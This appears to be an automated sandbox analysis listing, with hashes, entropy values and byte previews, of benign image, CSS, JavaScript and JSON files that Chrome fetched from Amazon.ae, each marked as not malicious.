                                                                                                                                                                                                                                                                SHA-256:39495131401B71CA51F5B4D4A1746037A0652EC179D51E0D228933D0AE8145B7
                                                                                                                                                                                                                                                                SHA-512:B93002AD79E156246AF9A91F6829B55062BD786A08C47D47F031C65EB717370082B131BC65620A94ED4C79AA206961F312B69D2DE92A4D4E6CA401DE069493E0
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                URL:https://images-eu.ssl-images-amazon.com/images/G/39/UAE-hq/2020/img/Apparel/XCM_Manual_1224505_1174644_UAE_3096775_153x125_2X_en_AE._SY116_CB431807455_.jpg
                                                                                                                                                                                                                                                                Preview:......JFIF..........................................................#......!.#.#""$'(#.'5...........!..."...)"(."$"".,"(!".#"........".$$#..$!./..."!'..$*......t...."...............................................................!..1AQ..Ua...."235BRTq........#Crt....$%b....................................................!12Q"...3Aa............?.........DD....D@...DD....D@...D^..$.......q..ZR.ed2..=...6....$.w......Eu..YH....I.f.T..qJ>f..T-g.K.[.....9..H....}........k..}......>.{$tQ..R.?W7.o.V...tC7...9mOC..d..'...?yM).\.S..?.w...S..z...bE.M.....yf?.u.3_.Q.<3F.$.f?K.&..@G......!../.e." .eC\._.j.5......u..._..8423..........._?]'.9d...AL."o...d.3...3.9.L.I.T.6.J.>.I..C#.E.......PW]F......b/...].[V.....l.lT.6..9V..S...j..5f.+n).....Os.e.PS$`.........e.L..../~i...Al....:q.u...^.1K1.&?..}e.....G/3.lA.2.$..vo''...SPW '...vU.h.N..K...A..I0.5N...../1E#..%.A8.P..$..N.M.e......-.f...F...\^....S.....<...`..L_.,.F75.g.G...R.$L.&{.h..#w2.g.=..?......$...#.s...z....qk)d.
                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                File Type:GIF image data, version 89a, 1 x 1
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):43
                                                                                                                                                                                                                                                                Entropy (8bit):2.9889835948335506
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:3:CUXPQD/lHpse:1Qvse
                                                                                                                                                                                                                                                                MD5:E68CC604CAB69BF03B8CD228D940F5EF
                                                                                                                                                                                                                                                                SHA1:15C0C62C4C7C917B5DD82A8E1E439211A44B9E98
                                                                                                                                                                                                                                                                SHA-256:A3A64AEA2E96EC58A163DDB8D4CF86CF236178ED2D225B8F44154BC1B010DDCE
                                                                                                                                                                                                                                                                SHA-512:E250128E5EBE1384113C834409BEFB9CD0728B68EF07AB3450CB0A11F64A8AE9B29C48695DB73D0E4BBA0FD976BDCC24BEEA0F326FAD1B4CA072BCCE6E24E3A5
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Preview:GIF89a.............!.......,...........L..;
                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                File Type:GIF image data, version 89a, 1 x 1
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):43
                                                                                                                                                                                                                                                                Entropy (8bit):2.9889835948335506
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:3:CUXPQD/lHpse:1Qvse
                                                                                                                                                                                                                                                                MD5:E68CC604CAB69BF03B8CD228D940F5EF
                                                                                                                                                                                                                                                                SHA1:15C0C62C4C7C917B5DD82A8E1E439211A44B9E98
                                                                                                                                                                                                                                                                SHA-256:A3A64AEA2E96EC58A163DDB8D4CF86CF236178ED2D225B8F44154BC1B010DDCE
                                                                                                                                                                                                                                                                SHA-512:E250128E5EBE1384113C834409BEFB9CD0728B68EF07AB3450CB0A11F64A8AE9B29C48695DB73D0E4BBA0FD976BDCC24BEEA0F326FAD1B4CA072BCCE6E24E3A5
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Preview:GIF89a.............!.......,...........L..;
                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                File Type:GIF image data, version 89a, 1 x 1
                                                                                                                                                                                                                                                                Category:downloaded
                                                                                                                                                                                                                                                                Size (bytes):43
                                                                                                                                                                                                                                                                Entropy (8bit):2.9889835948335506
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:3:CUXPQD/lHpse:1Qvse
                                                                                                                                                                                                                                                                MD5:E68CC604CAB69BF03B8CD228D940F5EF
                                                                                                                                                                                                                                                                SHA1:15C0C62C4C7C917B5DD82A8E1E439211A44B9E98
                                                                                                                                                                                                                                                                SHA-256:A3A64AEA2E96EC58A163DDB8D4CF86CF236178ED2D225B8F44154BC1B010DDCE
                                                                                                                                                                                                                                                                SHA-512:E250128E5EBE1384113C834409BEFB9CD0728B68EF07AB3450CB0A11F64A8AE9B29C48695DB73D0E4BBA0FD976BDCC24BEEA0F326FAD1B4CA072BCCE6E24E3A5
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                URL:https://fls-eu.amazon.ae/1/batch/1/OP/A2VIGQ35RCS4UG:262-5692979-3003613:M6RE43WFQNSF80R5MH23$uedata=s:%2Frd%2Fuedata%3Fat%26v%3D0.294992.0%26id%3DM6RE43WFQNSF80R5MH23%26m%3D1%26sc%3Dcsa%3Aatfsi%26atfsi%3D529%26pc%3D4844%26at%3D4844%26t%3D1723469068780%26pty%3Di18n-preferences-web%26spty%3DsubSelectPreferences%26pti%3Dundefined%26tid%3DM6RE43WFQNSF80R5MH23%26aftb%3D1%26lob%3D1:4844
                                                                                                                                                                                                                                                                Preview:GIF89a.............!.......,...........L..;
                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                File Type:GIF image data, version 89a, 64 x 64
                                                                                                                                                                                                                                                                Category:downloaded
                                                                                                                                                                                                                                                                Size (bytes):8865
                                                                                                                                                                                                                                                                Entropy (8bit):7.881132938956866
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:192:Y1cVEDjZAvmuIcq09pk4IYIhmJPjfr+UYN36:Y64jGeMpk4IYDJPjyUYd6
                                                                                                                                                                                                                                                                MD5:B05B81750794CA693E9589C0A171634F
                                                                                                                                                                                                                                                                SHA1:FA91375275E3E1C8FCD8F79BCAE5D85593A33C67
                                                                                                                                                                                                                                                                SHA-256:FF24D4B094AB1896672F4C8D387150C74BBB2493F7D01BEA7C87247AA0AB3BB5
                                                                                                                                                                                                                                                                SHA-512:0C1FBBBD92EAD677C12E4B8CC40239FF66D90A899180C0816A4827F982CB45DD259D24BBC08C34FF737BDE5D3BA3638FF99CA33F77D7C0D640B6970969D3B5EB
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                URL:https://m.media-amazon.com/images/G/39/personalization/ybh/loading-4x-gray._CB485916920_.gif
                                                                                                                                                                                                                                                                Preview:GIF89a@.@............................!..NETSCAPE2.0.....!..XMP DataXMPa1a8-9458-1177-8dcc-94086be1eca9"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>.!.......,....@.@....h..#.@*)..1..`.P.v.......p...e..}...7.Zm.[....O&$..#J...HN.4%=...F`H..n..4<+g+....F...I....u.ayn=>.u.K.dTw...Ln..w..u.1c.}...u.~.I...;G`..p....]........j..-....@j.My....R...$$....R.4.p.0..........G..p..!]}....0.vxq...]..(T..`...r.. ."...Z,c.@.....P..%.c.w..t..g`...Q..p.C..+M.."fK^.r..Q.M.6...S..FE..........*...Uo....J..>.v`..+W.:.,{....i.bl{...j..(.....w=...o1.p=H..vC.]...&....;.8f\.... .T.m.....$..\.....W;F..4h&.Y..3..*.so..-B..#...Z....uB.....KAd...`.w....|x.....?.||...O..9.w.Y..O..m......x..d.~.R.To.IvI..!.......,....@.@....x....H..8.3...TP[i2Q....g...8..[..-.....+...a.fDj............8....+.....&Ue.....a.e....`.n;t@z.f........jw.\.....v?\f...(z.z........k....H.........~@...G........v.....^...H.....N......e......a..........e.....e.......W......,Pp.A........:|..2,(..c.
                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                File Type:GIF image data, version 89a, 1 x 1
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):43
                                                                                                                                                                                                                                                                Entropy (8bit):2.9889835948335506
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:3:CUXPQD/lHpse:1Qvse
                                                                                                                                                                                                                                                                MD5:E68CC604CAB69BF03B8CD228D940F5EF
                                                                                                                                                                                                                                                                SHA1:15C0C62C4C7C917B5DD82A8E1E439211A44B9E98
                                                                                                                                                                                                                                                                SHA-256:A3A64AEA2E96EC58A163DDB8D4CF86CF236178ED2D225B8F44154BC1B010DDCE
                                                                                                                                                                                                                                                                SHA-512:E250128E5EBE1384113C834409BEFB9CD0728B68EF07AB3450CB0A11F64A8AE9B29C48695DB73D0E4BBA0FD976BDCC24BEEA0F326FAD1B4CA072BCCE6E24E3A5
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Preview:GIF89a.............!.......,...........L..;
                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                File Type:GIF image data, version 89a, 1 x 1
                                                                                                                                                                                                                                                                Category:downloaded
                                                                                                                                                                                                                                                                Size (bytes):43
                                                                                                                                                                                                                                                                Entropy (8bit):2.9889835948335506
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:3:CUXPQD/lHpse:1Qvse
                                                                                                                                                                                                                                                                MD5:E68CC604CAB69BF03B8CD228D940F5EF
                                                                                                                                                                                                                                                                SHA1:15C0C62C4C7C917B5DD82A8E1E439211A44B9E98
                                                                                                                                                                                                                                                                SHA-256:A3A64AEA2E96EC58A163DDB8D4CF86CF236178ED2D225B8F44154BC1B010DDCE
                                                                                                                                                                                                                                                                SHA-512:E250128E5EBE1384113C834409BEFB9CD0728B68EF07AB3450CB0A11F64A8AE9B29C48695DB73D0E4BBA0FD976BDCC24BEEA0F326FAD1B4CA072BCCE6E24E3A5
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                URL:https://fls-eu.amazon.ae/1/batch/1/OP/A2VIGQ35RCS4UG:262-5692979-3003613:JZJKZTDKNV2CKC82BW2M$uedata=s:%2Frd%2Fuedata%3Fat%26v%3D0.294992.0%26id%3DJZJKZTDKNV2CKC82BW2M%26m%3D1%26sc%3Dcsa%3Avl100%26vl100%3D3583%26pc%3D16650%26at%3D16650%26t%3D1723469060972%26pty%3DGateway%26spty%3Ddesktop%26pti%3Ddesktop%26tid%3DJZJKZTDKNV2CKC82BW2M%26aftb%3D1%26lob%3D1:16650
                                                                                                                                                                                                                                                                Preview:GIF89a.............!.......,...........L..;
                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 154x200, components 3
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):12293
                                                                                                                                                                                                                                                                Entropy (8bit):7.9631013098228705
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:192:t4QlkEI0DSLkr0DAtAOh2oUdkuU+8ajI+w1M9w0d2Mqa3ahj4z0InvSqKAL:vlndMkr0UZhpF+3QM9wAqrhj00aqs
                                                                                                                                                                                                                                                                MD5:6146829B988F96270E3CAD418B69D19B
                                                                                                                                                                                                                                                                SHA1:71F984C84547F9C52F0324A854914F2F8B45E6E8
                                                                                                                                                                                                                                                                SHA-256:D22559C8C0E4AD7BCC835E5B43A180219517F05E04C51841C99BE6372184E6FB
                                                                                                                                                                                                                                                                SHA-512:5F8A8DDCDA56B4086C1D7B77191FA5A5E168743257A651699EE3054C779B1642A66488E8E194E9D559DE979BC58871348F79E0E301083EB5CE469920B6CE3370
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Preview:......JFIF..........................................................#......!.#.#""$'(#.'5...........!..."...)"(."$"".,"(!".#"........".$$#..$!./..."!'..$*..........."................................................................!.1."A.Qaq#2....3BRV.....CTbr..$6Stu..&4Dc.........................................................!1.Q."Aaq...2RS....BT..br...............?.......a....O...I....$...5...5.B...H..YY.o!|L..C..M....}..St..A.{T..DC.t...[.A#..29..M..$e..N.._...j....tY.c0z5.C..M....M...r...o...|.@...=.|..T.|o.l`.z{.J............dZ.).2A..C6]..,r..v.RR.y".P.!`..F.%..c.Q....F..Q...88....:..M............1H..x.^.V..k.Z..5..,.2.D.d......[w.RA....UK.L..:..>!d.!g.R.....|._O.2Z..+.e&.R.0...d...,...U.jq.c:8d..Y5*.$...Fo...m>%e..i.x..._....$X..5..............MX.0....,UxP[...I.,..jPM.-L..S...H.w...$W... ]y...U..Y#..j3.@i$b...r.b......F.y...5.%..G.jI.`..(]D.U.oq$...=..c.b.........-e!.93.e.m..,.$...#........#.Y_..t.......9BN...p......xT.]../....t[!.p9
                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                File Type:GIF image data, version 89a, 1 x 1
                                                                                                                                                                                                                                                                Category:downloaded
                                                                                                                                                                                                                                                                Size (bytes):43
                                                                                                                                                                                                                                                                Entropy (8bit):2.9889835948335506
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:3:CUXPQD/lHpse:1Qvse
                                                                                                                                                                                                                                                                MD5:E68CC604CAB69BF03B8CD228D940F5EF
                                                                                                                                                                                                                                                                SHA1:15C0C62C4C7C917B5DD82A8E1E439211A44B9E98
                                                                                                                                                                                                                                                                SHA-256:A3A64AEA2E96EC58A163DDB8D4CF86CF236178ED2D225B8F44154BC1B010DDCE
                                                                                                                                                                                                                                                                SHA-512:E250128E5EBE1384113C834409BEFB9CD0728B68EF07AB3450CB0A11F64A8AE9B29C48695DB73D0E4BBA0FD976BDCC24BEEA0F326FAD1B4CA072BCCE6E24E3A5
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                URL:https://fls-eu.amazon.com/1/batch/1/OP/A2VIGQ35RCS4UG:262-5692979-3003613:PAGVV1BKBQP3X0S0NFTP$uedata=s:%2Fap%2Fuedata%3Fat%26v%3D0.295375.0%26id%3DPAGVV1BKBQP3X0S0NFTP%26m%3D1%26sc%3Dcsa%3AendVL%26pc%3D3927%26at%3D3927%26t%3D1723469077945%26csmtags%3DendVL%26pty%3DAuthenticationPortal%26spty%3DSignInClaimCollect%26pti%3Dundefined%26tid%3DPAGVV1BKBQP3X0S0NFTP%26aftb%3D1%26lob%3D0:3927
                                                                                                                                                                                                                                                                Preview:GIF89a.............!.......,...........L..;
                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):215
                                                                                                                                                                                                                                                                Entropy (8bit):4.97423508161732
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:6:2LGDtF4IzO/Bqkhab4KYK7vfITow+1MRR1anMAuLhtI:2Q3JC/BVab4NK7vftjMzI
                                                                                                                                                                                                                                                                MD5:2115ADCB9BE68682D036FDD4BB9BCFB0
                                                                                                                                                                                                                                                                SHA1:4EA836ED7D69B815680D0A419BA4FFE1E1DCFD55
                                                                                                                                                                                                                                                                SHA-256:51BF16CE55A5D6EA57A258B90F7ACBF586CE94A8770EA55860D345BB821BD2F5
                                                                                                                                                                                                                                                                SHA-512:B1F0F9613CDFD0A08149779686CF185B1AB8FE514FC6CD89B5B6AF08D894006DBAA31D8916EE90B83517983575ADE235EDA8E5482C388A94678390A331F793EA
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Preview:(function(c){var b=window.AmazonUIPageJS||window.P,d=b._namespace||b.attributeErrors,a=d?d("CartComparisonAssets",""):b;a.guardFatal?a.guardFatal(c)(a,window):a.execute(function(){c(a,window)})})(function(c,b,d){});
                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                File Type:GIF image data, version 89a, 1 x 1
                                                                                                                                                                                                                                                                Category:downloaded
                                                                                                                                                                                                                                                                Size (bytes):43
                                                                                                                                                                                                                                                                Entropy (8bit):2.9889835948335506
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:3:CUXPQD/lHpse:1Qvse
                                                                                                                                                                                                                                                                MD5:E68CC604CAB69BF03B8CD228D940F5EF
                                                                                                                                                                                                                                                                SHA1:15C0C62C4C7C917B5DD82A8E1E439211A44B9E98
                                                                                                                                                                                                                                                                SHA-256:A3A64AEA2E96EC58A163DDB8D4CF86CF236178ED2D225B8F44154BC1B010DDCE
                                                                                                                                                                                                                                                                SHA-512:E250128E5EBE1384113C834409BEFB9CD0728B68EF07AB3450CB0A11F64A8AE9B29C48695DB73D0E4BBA0FD976BDCC24BEEA0F326FAD1B4CA072BCCE6E24E3A5
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                URL:https://fls-eu.amazon.ae/1/batch/1/OP/A2VIGQ35RCS4UG:262-5692979-3003613:P3EBDX30THKD0V702NQB$uedata=s:%2Frd%2Fuedata%3Fat%26v%3D0.294992.0%26id%3DP3EBDX30THKD0V702NQB%26m%3D1%26sc%3Dcsa%3Avl50%26vl50%3D2510%26pc%3D7580%26at%3D7580%26t%3D1723469085486%26pty%3DShoppingCart%26spty%3DCart%26pti%3Dundefined%26tid%3DP3EBDX30THKD0V702NQB%26aftb%3D1%26lob%3D1:7581
                                                                                                                                                                                                                                                                Preview:GIF89a.............!.......,...........L..;
                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 450x320, components 3
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):3550
                                                                                                                                                                                                                                                                Entropy (8bit):7.327716549611057
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:96:Tge5fx/fypCEkzOoZZdONU1b12r10rzkhA:Dx/fypCEkzOoZmO1b1G01
                                                                                                                                                                                                                                                                MD5:3C188AFF5CD447DB7C131231621BAB0E
                                                                                                                                                                                                                                                                SHA1:77382796B9066AD50F3E3CBDAD71888987514348
                                                                                                                                                                                                                                                                SHA-256:C2D8DA36D1C38622B29B9CA8B2867F4A4E3FC457CC5E136FBFE5233FFAD4391A
                                                                                                                                                                                                                                                                SHA-512:C0E62245E840E092535E7472534354A6608A3455EDEC13C3E43020DE541BC26CEBE5D2AD3627679EE1235005FB86D0E0368AD3B7219B48B12CC607A1A8947C04
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Preview:......JFIF..........................................................#......!.#.#""$'(#.'5...........!..."...)"(."$"".,"(!".#"........".$$#..$!./..."!'..$*......@...."..........0.......................................................................~L).<....~`$.../L.v..................y..-..E..........-....d..;.........................7.6]Yd......Y.....g............................q.;.....xNK.c..}7..z..................a.<.ob.~.."..bN:...\........................m9.d..O.f1.e9....JV.. ................&M.6.3...".,...|^....@................t..,.6..f9.UYF*Si..n'.....................e.fL..V.{....I1R.A~;n'..@....................g...+BMy.IU..w.7....!.................:]Ivd...h. .&.......v.Om.. ................'K.....V...H.kI0n.n.>.......................ud..|..*..,..L;.{r...~.=..................>Mi6d..^...F.ZI.kWg7.o.....................'.".....&..4..........=..................>=.V......j4..c.......= .................?..y.+...4dV.Q.T..3.mK.....................
                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 480x440, components 3
                                                                                                                                                                                                                                                                Category:downloaded
                                                                                                                                                                                                                                                                Size (bytes):12378
                                                                                                                                                                                                                                                                Entropy (8bit):7.859662436851788
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:384:G3tYxQbJitEn6BI4K5C7pltAOXcIVou88zED+:GdYWV2GV5OT5VouvzED+
                                                                                                                                                                                                                                                                MD5:F002997F01FFD9080201C730FC433ACB
                                                                                                                                                                                                                                                                SHA1:46205D85BB9B4C0E1B57EA53708C55A9C064E1BD
                                                                                                                                                                                                                                                                SHA-256:5D7382E6D5B13212B2072F1B5CC7C084ED8DE9850C8B5317BEA0300138B2D811
                                                                                                                                                                                                                                                                SHA-512:CB67799F319FC1ABB42E1CC191A058FD994DEAEAD0FD4E5C0EB10B32E250AD10055F0FB32B28B28E441296E3FBE9E35F7D053476619ED787F2905B039037B4D6
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                URL:"https://m.media-amazon.com/images/I/41Zp3xaXvPL._SR480,440_.jpg"
                                                                                                                                                                                                                                                                Preview:......JFIF..........................................................#......!.#.#""$'(#.'5...........!..."...)"(."$"".,"(!".#"........".$$#..$!./..."!'..$*..........."..........3................................................................................................................................................................3..d.{.tSRX*.ZJ..Zj.Z..Z..Z..Z..Z...ZJ...!m*...iw@..........D...#....<}5.....W...............Yb.....I&...W.^.=.4s..?.::'.......'.................i..6......u'.N ...L...L/...hq.X.oS,.T..c.../.zo.[.,/.k.C|...K.W....G........\wH..........)x..)^.1....A.W..v...S.kI......K.....".?..`.U.......Y..4.{...j$:*..f.W2..7t..=. ..........j.1...z.v.C.....;F;*.jW........yM.4Rx._W.....r.........X..LCS..j.....#X...y....<..q..........Rpi....#.K....9.Lc.k.u.s...N.%.Y..z(.."Up.f%Eo.'.=.....-ab.q+U...j?...6.`l<+.:_..w................@+...=...A.........a.nz.6.......x...9.....]..[..o.l,=.........!....g*.'-u/.w@..........(:.}^W....{jv...s.6Q..N.UU.e.JV
                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                File Type:ASCII text, with very long lines (1945), with no line terminators
                                                                                                                                                                                                                                                                Category:downloaded
                                                                                                                                                                                                                                                                Size (bytes):1945
                                                                                                                                                                                                                                                                Entropy (8bit):4.90323937049848
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:24:B5sCI5QKfDVC8VMQs6sKfDVC8VMQUqasJgygADwioIVUimVE3cxem9VE3cxeh8U+:BA5QAlm7Alm9OFhEiYEmHEh8ES6CseXz
                                                                                                                                                                                                                                                                MD5:89FB4AB7596766681C5B4F4BE5AA9C6D
                                                                                                                                                                                                                                                                SHA1:246317D652E9EC8CC29770FAE8FE1E0D7FE31FAA
                                                                                                                                                                                                                                                                SHA-256:EC868CB6913B53B496369F5AD016A9783B37B5B9CB4EA15798F5ED1F1CBD4A13
                                                                                                                                                                                                                                                                SHA-512:9D299FE9B024BDEF42A7C2D83B853FD86C4608436C93843E643327A5DAE38C389A5268C4FFB6D326B3BD55EF5D54A0AE407AFFA53C47A39E41558F36701C09D8
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                URL:https://images-eu.ssl-images-amazon.com/images/I/01mLnxJuOBL.css?AUIClients/SocialShareWidgetAUI
                                                                                                                                                                                                                                                                Preview:.ssf-share-trigger{cursor:pointer;display:inline-block;background-size:cover;outline:0}.ssf-share-trigger.ssf-no-style{background-image:none!important;height:auto!important;width:auto!important;display:block}.ssf-noclick{pointer-events:none}.ssf-background{border:1px solid #ddd;border-radius:50%;display:flex;align-items:center;justify-content:center;top:10px;right:10px;z-index:1;background-color:#fff;width:calc(24px * 1.4);height:calc(24px * 1.4);position:absolute}.ssf-background.ssf-bg-count{border:none}.ssf-background-float{border:1px solid #ddd;border-radius:50%;display:flex;align-items:center;justify-content:center;top:10px;right:10px;z-index:1;background-color:#fff;width:calc(24px * 1.4);height:calc(24px * 1.4);float:right}.ssf-background-float.ssf-bg-count{border:none}.ssf-share-btn{right:8px;top:8px;z-index:1;position:absolute}.ssf-share-btn-float{right:8px;top:8px;z-index:1;float:right}.link-section,.ssf-channel{white-space:nowrap;overflow:hidden;text-overflow:ellipsis}.ssf-cha
                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 240x220, components 3
                                                                                                                                                                                                                                                                Category:downloaded
                                                                                                                                                                                                                                                                Size (bytes):2801
                                                                                                                                                                                                                                                                Entropy (8bit):7.457189804095179
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:48:TT0Z7sGN6Z3+1J53acOFzLVH/UBtvNI1VI+g0zqWRcWYpYCJTCaQi+yfn:TZ+1qpkrIo6FeWKR0yfn
                                                                                                                                                                                                                                                                MD5:6AC6C0574BD82D70CCC28FE0EF6C5270
                                                                                                                                                                                                                                                                SHA1:CF2ECF9ACE08A4A5EF62F317E85F98DAB8E18414
                                                                                                                                                                                                                                                                SHA-256:113FBB0CECC892BCD0AA86DBD5DCCA0DE3E0FF065E25A6CDEAC5D13940B2C3EE
                                                                                                                                                                                                                                                                SHA-512:48F61684DEE7F4B54037FD00498262EEA30A796AB87F671A260A38384C2C18FAD97778542315AED857D93EF3150BCDA88074BE7278660811ACE33076D26FB99E
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                URL:"https://m.media-amazon.com/images/I/31AGMSYB+OL._SR240,220_.jpg"
                                                                                                                                                                                                                                                                Preview:......JFIF..........................................................#......!.#.#""$'(#.'5...........!..."...)"(."$"".,"(!".#"........".$$#..$!./..."!'..$*..........."..........1..............................................................................................................................9....(S...5.+................F.j.J.Y....!.J...?..<...,.|}.Z5h..Z.U..e.l..1.H....R.cU.oxp.[......LA..........36.s.c....f..'4:G...7..[%.<..J..5kiF..l'.S...H..J"......H.?.........s..t.s.a.."]}..D..A.8.............................................................................!1.. 02..@"#A3Qap..............7.._..`p^%;~Aw.3..1....g..C...........C<..>....y.:/.....%...L.w[......<Y..........iQ...i....09}*.6.".uI...P..H....&.....3....y..H&....O.k...a..[O."..S#.!....=..7.x....~fkLee..pX...=..V...d..yL.<..N#P9.Lr.I..:'....9.vj?...p..,..ma3..dn,..?..}64..._UM...#,....7......]..=...0.H..6.=.lW:...ZgZ.Z..u*....,8.+.K..M:...0.L..=IW. >..aWYw.I.....ec94.9.#.yc.UG.........\...A.;.
                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                Category:downloaded
                                                                                                                                                                                                                                                                Size (bytes):813
                                                                                                                                                                                                                                                                Entropy (8bit):1.6642092553022059
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:3:PvFvvF3fFvvvF3t/NvXvXvXvFvNvf1/3/VXvXvXvXvFvNvfV/dN/NvXvXvXvFvNn:eHFLinQPyn1zIXGvv3
                                                                                                                                                                                                                                                                MD5:021412A9D349D488D1500968D3A8E745
                                                                                                                                                                                                                                                                SHA1:457D01D5D9C8BAC326A4E59BA847B9EDBEDD18B5
                                                                                                                                                                                                                                                                SHA-256:E2390201730466B2899F8CFCC73C30C32E2891FC3ECC007DC9A8D63838E575F4
                                                                                                                                                                                                                                                                SHA-512:122B990D87026299F84626EA1D58324647BF4C92F632A9C661B7BD13BCCAFA739AA17C6A05FA7EFA73C441472E6859132E21B4EB79F95249B7659A9C23C87CCB
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                URL:https://www.amazon.ae/gp/cart/checkout-prefetch.html?cartInitiateId=1723469082213
                                                                                                                                                                                                                                                                Preview:.. . . . ............................................................................................................................................................................................................................................... . . . . . ................ . . . . . . . ............................................................................................... ... . . . . . . . ........... .... . . . . . . . .................. . . . . . . . . ........... ................................................................................ ............{"prefetchSuppressionReason":"CheckoutPrefetch:prefetch-pipedata:ZeroCustomerId"}....
                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                File Type:PNG image data, 440 x 300, 8-bit colormap, non-interlaced
                                                                                                                                                                                                                                                                Category:downloaded
                                                                                                                                                                                                                                                                Size (bytes):2016
                                                                                                                                                                                                                                                                Entropy (8bit):7.538344195002318
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:48:UZMU7HaDUllBllllllll35llllQnxuxplTDOII84llllllll8lllllllllNHhp6b:aMIHaDUllBllllllllpllllQnxOpJO/R
                                                                                                                                                                                                                                                                MD5:764A788FCF655624F21D3865A556F75B
                                                                                                                                                                                                                                                                SHA1:B4BF5DAFCF2A1C32B91611B78E3AD1EE23B40AED
                                                                                                                                                                                                                                                                SHA-256:6BAC2D0C2206A7F1C4009811A5B3ABB1A78DD4CAF6B5FD6BADE051F1ADADAC1E
                                                                                                                                                                                                                                                                SHA-512:73DE297DE7995E08BA111D77A170CCC8C506AF829F873AE57DBF27CE53B5F96E3BA2F2D0D1C7CE1F2C5C4F7CEBB80D5EB9280E4DC90A673AA8516B76A17CF817
